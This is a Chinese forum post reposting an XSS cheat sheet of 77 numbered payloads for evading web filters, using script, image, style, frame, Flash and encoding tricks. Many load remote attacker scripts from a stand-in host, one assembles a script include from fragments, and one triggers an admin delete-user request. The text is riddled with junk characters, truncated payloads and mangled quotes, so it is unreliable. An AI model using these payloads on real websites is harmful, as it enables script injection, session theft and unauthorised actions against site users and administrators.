貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" m5 b3 Q& O j$ G
2 D+ @) t8 L. `, M& Z' P (1)普通的XSS JavaScript注入) @* A7 }9 ?! _, J' o, Q6 G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 p8 s8 C1 l% {- z' J9 W6 }
9 i& e' k* b. O$ {/ ?7 A
(2)IMG标签XSS使用JavaScript命令
) U1 Y# h$ `' v5 { <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. ]& _7 p5 r. Q4 B3 ~, } |
3 c3 G$ k, X4 m! ^: ?/ q! W
(3)IMG标签无分号无引号
5 L6 E. M1 Q; y+ a <IMG SRC=javascript:alert(‘XSS’)>9 ]$ B7 e: B( E
1 X* E# P: L( N P3 e, _
(4)IMG标签大小写不敏感- O j( c* e* Z$ T4 w
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>4 ^# [1 B, S, j7 t! ~
6 Q# ?& v# m3 ^7 |0 l, T (5)HTML编码(必须有分号)
+ `" [ I! C9 {7 T- d8 \# I2 T <IMG SRC=javascript:alert(“XSS”)>
5 B! B, }4 w& U" \7 h x
( I; s6 d( j! Y% C; \ (6)修正缺陷IMG标签* V% l; b% p) S. o5 l
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 z* K: O6 U( O$ E- S3 ]
% Z2 B2 F0 z# U# G3 n% \! j6 x
(7)formCharCode标签(计算器)
5 \7 K" y5 n+ L; ^) Q5 [ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 R9 H; t+ u2 V* M8 C& p, @1 v Y# h0 l& V5 J
(8)UTF-8的Unicode编码(计算器)" d8 }0 q, ]0 C
<IMG SRC=jav..省略..S')>: u' Q4 p7 \8 K1 d2 s" y
" K* s$ A* f0 O+ ?9 s (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# `# I' B5 i. }; h3 I# |* N! ^ <IMG SRC=jav..省略..S')>/ I5 I6 p/ [( F1 L- D' K
; ]9 N! t* T- @" G" [7 H9 O
(10)十六进制编码也是没有分号(计算器). ?. f, R5 y3 H0 S8 w7 |
<IMG SRC=java..省略..XSS')>
! \$ Q! i1 ^* f8 [# N5 C9 P8 p/ j9 w6 U: ]) ?
(11)嵌入式标签,将Javascript分开
# \; j0 i( P; f* t5 ?6 u+ B <IMG SRC=”jav ascript:alert(‘XSS’);”>$ e- ]4 c. G8 D6 f' Y; Y6 D
! s6 G0 p+ Z8 W9 W1 M' p7 n- ~
(12)嵌入式编码标签,将Javascript分开
4 c& f4 p0 Z! n <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 G; L4 _% t9 Q V& j) i: L( R, {' C% B0 g6 ~% P- ^/ C
(13)嵌入式换行符
* J/ R* o% I6 m# v2 T2 P2 Y <IMG SRC=”jav ascript:alert(‘XSS’);”>
+ x$ u7 r& b% t+ l. I% U
5 |( p2 w' d1 a: X1 C( u, @, h (14)嵌入式回车0 ?- E- Q6 ?5 N2 B3 K; v! W h
<IMG SRC=”jav ascript:alert(‘XSS’);”>" h: c! ^! E' F, u3 J( D5 m. _
. N0 ]/ E6 C% c% E- r
(15)嵌入式多行注入JavaScript,这是XSS极端的例子4 f0 h( Y0 l6 A+ `! e
<IMG SRC=”javascript:alert(‘XSS‘)”>
' ~' I+ l1 O- p: A5 t( @
* n/ b8 }8 Q( H! w (16)解决限制字符(要求同页面)3 ?3 X( ?4 b7 f' h" M# L2 q
<script>z=’document.’</script>
' u; G P/ S3 j <script>z=z+’write(“‘</script>1 f+ ~& Y/ k( |
<script>z=z+’<script’</script>( N# r, S9 p- j6 \4 \. \& ]+ y
<script>z=z+’ src=ht’</script>
/ ]4 S6 Z# Y: B4 q# P: U <script>z=z+’tp://ww’</script>
! G% b) R% i6 b. a( N6 R( ~ <script>z=z+’w.shell’</script>
8 Z: b0 y4 a+ F: c, `) @ <script>z=z+’.net/1.’</script>
6 f4 \8 s! X9 e) c, H0 e <script>z=z+’js></sc’</script> q# p+ t' y6 Y2 \0 h, p( g: _ u6 }
<script>z=z+’ript>”)’</script>
. M- e: O% n! r( E& g <script>eval_r(z)</script>7 k, I; ?& t+ g5 U
) ^8 i% Z: V$ ]* m" x. u: t
(17)空字符6 r+ y& `& g6 S0 X# X& ^% E
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 y6 W4 D' D5 ^* F
; G2 B6 @* K3 h( C8 {6 k. M) X0 ` (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 R8 d6 K; p5 E perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% J% q# y9 y+ D, g0 x1 } k( K) g S2 A ]; K
(19)Spaces和meta前的IMG标签
* z9 T9 X* Y/ P N <IMG SRC=” � javascript:alert(‘XSS’);”>
) I- n: x# a( p7 h5 M! E7 J4 {6 r7 ~8 g# O$ T% C
(20)Non-alpha-non-digit XSS
7 V$ m* z' V& P6 ?; a$ w% E% a <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 ]; `& `, f Z5 x) q! l
1 s$ w# l5 d' J' }( N (21)Non-alpha-non-digit XSS to 2
6 m( L+ D! e9 I- Y4 x, r <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 y! c/ c1 J& K3 H& K/ A' }+ p
' X7 G+ D0 k0 O. \ (22)Non-alpha-non-digit XSS to 3& y7 s0 ?1 ^+ `
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; ?8 P. Y5 d# c6 `8 w k6 }6 ~# Y% m* a7 P
(23)双开括号
6 M j% ~' P3 e& P( X/ U <<SCRIPT>alert(“XSS”);//<</SCRIPT>0 e+ \9 A2 E; ^& v1 k, q2 h" j9 k4 }
}. |0 ~0 v O. h
(24)无结束脚本标记(仅火狐等浏览器)1 [* p/ {) f! T0 E* {/ }. z5 K& ]
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> g/ n; n! M: s3 q/ o0 ~$ k
7 ~! |' A. E% P$ R3 y( M( C
(25)无结束脚本标记21 o4 ]" A- C- ]& j2 g$ |
<SCRIPT SRC=//3w.org/XSS/xss.js>5 W6 C8 ~$ M. w8 R
2 [1 v( L$ [* ?" ]+ d$ I (26)半开的HTML/JavaScript XSS
* }% I X, z/ L/ ^/ U# k6 e( J$ f4 u <IMG SRC=”javascript:alert(‘XSS’)”
0 b \5 P! |$ f# N
9 @$ l) a4 }8 m0 r: B0 J( _) w (27)双开角括号
% `; @7 B) u; x# a: ~ <iframe src=http://3w.org/XSS.html <$ a- f: v% W0 R/ E7 _
7 B9 J' @- [" y+ ^: Z: E1 \
(28)无单引号 双引号 分号 L# N8 [3 K' K; ] n6 Y6 u9 B
<SCRIPT>a=/XSS/
, P" ^7 y% N- y: v/ A+ m7 O alert(a.source)</SCRIPT>6 s- y: D4 R4 Q! A; v" q% d
, I5 S* H' h* g! ]) H5 e1 e
(29)换码过滤的JavaScript, k; y! G& |3 @5 B6 R- t
\”;alert(‘XSS’);//4 q& Z0 K- z7 ~- M9 H; h: d/ G
% a- Q! ?. v5 s: L) t
(30)结束Title标签0 e8 N: c/ x( Q( S. [/ Z
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' h2 F' I$ i. R$ Y! Q
0 ]# ^) S" y( Z3 G$ n (31)Input Image
. Q! N! C4 B. _4 |. M <INPUT SRC=”javascript:alert(‘XSS’);”>" E5 G# _5 [3 W- Q ?1 f
j+ h5 J7 R( Z: Y
(32)BODY Image
1 n, V) Q, I5 a6 [5 M4 y <BODY BACKGROUND=”javascript:alert(‘XSS’)”>: h5 U) W) Z. U( \$ m( ?
6 j2 z) B, n5 U; R (33)BODY标签1 U0 t9 c2 z& b% T
<BODY(‘XSS’)>
0 h1 d7 D2 j1 B0 c" g
5 y u n9 o7 x, i (34)IMG Dynsrc
" _3 {" K, \6 x( W, Z: w <IMG DYNSRC=”javascript:alert(‘XSS’)”>
! W: ^2 j' q; O2 N6 r0 F/ |) U' O+ H; b7 w2 {) d2 \
(35)IMG Lowsrc
; R4 B; u. [, d1 U <IMG LOWSRC=”javascript:alert(‘XSS’)”>
* v9 ?) \/ n m4 p; G; A- R+ S+ F& P
4 ?' E) [4 C: f- d3 Z (36)BGSOUND: D) h! }6 T" i- f
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 K2 @' C! d6 c' p h, E$ _3 |( u% B$ W! e# a. K
(37)STYLE sheet
% J f7 c# V0 h/ p4 j <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- {" u4 e" A" i' T
- }- F5 A% S6 g
(38)远程样式表2 c! Y" B+ {' x. g) U
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! s" H" o$ F; O% Z u2 Q
/ Z0 v/ e$ R" ~) G; w (39)List-style-image(列表式)7 C( }7 j) k7 `: W) k d
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 c+ S# l) }0 Y8 B" M! u3 l; r4 A( R! U+ S; S" h
(40)IMG VBscript
4 T6 t/ N6 q s1 z2 l4 L \ <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
+ i! c- m: b1 [! {$ `/ x, O; M6 y- X: X/ ~+ x* ~
(41)META链接url
/ g* M3 g7 y1 v4 X1 K <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>. J) L4 a* `- R# | a: ?
: I! K! y1 p# ? (42)Iframe
; T, b) j$ X/ @: e <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME># ?# ^ m! c1 Y. f. n1 t
' l7 c) c' E2 R4 F3 i u5 P5 x (43)Frame1 M' A+ Q# s) @6 e9 u- B3 ?1 V
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>5 f0 m, T$ o, O6 D/ P
# i, R1 o$ t& p; ]( r" ~
(44)Table
+ [8 N+ H! V! d3 H7 H <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 m6 Q9 Y0 @8 C. X: V: Z
. b! F1 A) j1 T. N5 i (45)TD+ b& }6 V; a5 z3 }
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 r8 z. |+ k b! K" |% P' ?
" C' S3 L! D/ w# _ (46)DIV background-image
- O4 U. k; p% Z% h <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 P! z# a3 W1 O2 \! Y
9 N. @. g. |' o1 D) L
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
; Q3 e# ^# m. f, P# ?; s7 ]7 B3 z <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
- E$ d# _0 e3 s% N$ I1 n; o# c( ], Q0 o* u9 J r
(48)DIV expression
( v9 S/ V3 A5 R) e9 `# T3 _& n <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% W4 f/ w8 Y8 R, R: Z: Z) ?1 v) \/ v* E/ h5 b4 ~& o! D
(49)STYLE属性分拆表达4 @5 Y- D5 F7 q9 N/ ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ o8 k0 o# b- w
( K+ x6 F2 C" y0 T. V (50)匿名STYLE(组成:开角号和一个字母开头): T% E. O! |: P
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* r6 ?1 ~) s) J
$ d. w" Y( j$ z( j: P( k: F7 l
(51)STYLE background-image
' U/ B5 p1 {" y- c5 H6 `; h <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 r3 `: s+ H" O
5 e* X' u% u$ q9 m4 V; F' P1 E$ m
(52)IMG STYLE方式7 ~4 ]& d1 S, U
exppression(alert(“XSS”))’>
/ B" L; f8 f! m- u* i& b4 R% q) E) N+ ^0 o [! F1 Z; B9 l o
(53)STYLE background2 i6 T% A: B; ~$ | D
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>% b( f' B+ H8 I; \
7 T* H# [/ ^) O% s1 m4 Q" u* J (54)BASE& o/ n& t7 b0 y. M" G1 l
<BASE HREF=”javascript:alert(‘XSS’);//”>
% A, J1 K! `4 F9 T
2 a7 }8 H0 C/ z% @# p (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS8 I V/ w. x9 @4 n! L3 g
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
# r* K* G" w* i) O" F% Y/ |$ U& G `
(56)在flash中使用ActionScrpt可以混进你XSS的代码
6 V* J9 N: E1 t+ p% L a=”get”;
8 ]/ \' ^0 B9 g. X1 C: i8 z b=”URL(\”";
" N: ]" N+ d1 F) n" S) g* s c=”javascript:”;
7 |# C% P/ ]' }8 U% w5 K% r4 a3 Y0 a d=”alert(‘XSS’);\”)”;
, B7 Z) _. P$ }$ s eval_r(a+b+c+d);1 r' F- ~" W5 L& v* u+ E1 ?
* }5 g6 Y- c! D$ D$ B3 {
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) w3 U! J0 s2 a0 r <HTML xmlns:xss>
8 m& r9 I3 D5 g! N4 w. e <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% ^4 ^' e; f" I) I <xss:xss>XSS</xss:xss>! u- G3 b, C+ ?8 R! i
</HTML>4 | }; t! D' L* G' q) Z+ |) Q
0 H! u8 i! o, T4 K4 w8 y& c
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ l, x C# i& `) d" D <SCRIPT SRC=””></SCRIPT>6 D5 Q+ [/ W, S9 g% K% a8 _
4 k( `1 J6 M( b* F* B. {3 ^1 v0 ]
(59)IMG嵌入式命令,可执行任意命令
+ D+ W- g& O' P8 |2 X" U <IMG SRC=”http://www.XXX.com/a.php?a=b”>7 |, D6 Z1 w( \& v4 \/ x
; \# L5 L/ P( u! ]- h4 @ (60)IMG嵌入式命令(a.jpg在同服务器)
- T0 j" C4 J# |1 I# L2 d5 ^( g' I Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; Q; [; Q1 v# y) q4 j, E: t* q6 C4 d( Q2 q! i @. j
(61)绕符号过滤/ _* F: T3 r# u- _3 Q) l
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 n3 e( x$ ]. `2 p
! P. r& |$ V; k" x- B
(62)
' l. l2 j8 f/ s7 L <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 v2 R! O$ y$ J7 V; w |6 n! u3 E( f! e) Q
(63)
. h0 [+ ?( l3 Q( M% l$ _ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 W ]4 J D) J5 F/ I9 `2 @: g+ o' T1 h6 a
(64)
4 [" x* ~2 x, u) _ y1 e, V <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 ~) P, S! V3 |8 U. k" D$ }6 R0 l# z. ^3 p- X+ t
(65)- K2 Q/ {' O% W1 u
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
: Y4 V2 E' }: g6 u( p. y
f2 `9 J/ O0 N: l2 K (66)8 [: z& @' ]9 W, c: Z- S
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 H, j$ i" A2 x: l4 s
3 h: s% N7 j* o9 d/ R1 e (67)+ {) c! G2 x: i" p7 s9 t4 d
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
, u" u+ o m- ~# u3 F: F
7 H l6 N0 G# e. c( q (68)URL绕行% e; f2 X: J, v3 r
<A HREF=”http://127.0.0.1/”>XSS</A>- q* t5 V/ t9 ^; p% `
& ~ F, b3 `. `; R
(69)URL编码6 u% k1 T7 o! `6 }1 f; G
<A HREF=”http://3w.org”>XSS</A>
# N- {( A$ \1 `2 f; X7 r9 |) k i- s' z& {. R [
(70)IP十进制% W; x4 k, ^# P5 k
<A HREF=”http://3232235521″>XSS</A>8 c' g! i0 @) X$ a
9 q3 n( i' ?/ r: K; c. n (71)IP十六进制5 ]2 ^; x& j: s/ I
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
5 b3 M" {% B9 @2 ~# t4 m- W, z, }* Q k: l0 [
(72)IP八进制 e. T( o( P( y2 m+ M# L8 p# S
<A HREF=”http://0300.0250.0000.0001″>XSS</A>7 B- i$ |- X2 J' ~. x* Y
: [2 D% W5 D8 Y/ M (73)混合编码$ `# w9 t& G Z& {; `8 o) g
<A HREF=”h9 W( [& y$ s% n$ x* h2 m
tt p://6 6.000146.0×7.147/”">XSS</A>% O4 d' b; P2 R' U
( F4 a& \, x' h (74)节省[http:]! \4 z1 g0 s4 J
<A HREF=”//www.google.com/”>XSS</A>
( e; p8 n4 d( I, i( q2 W, F! ~$ u4 H/ w* `4 d" ~5 G5 N
(75)节省[www]0 J: L- \+ p& x) g. O1 g
<A HREF=”http://google.com/”>XSS</A> c+ `: U# g# [
/ p: F n$ v3 K1 `8 [7 ~7 j/ D
(76)绝对点绝对DNS
. X' ?) O. E5 B& ^' P <A HREF=”http://www.google.com./”>XSS</A>$ A6 E E; O/ t: f# j( W! P: x1 K3 K
. I5 p s, h9 F" v8 p; {8 X5 H (77)javascript链接5 g; c9 ~' f) C3 W
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对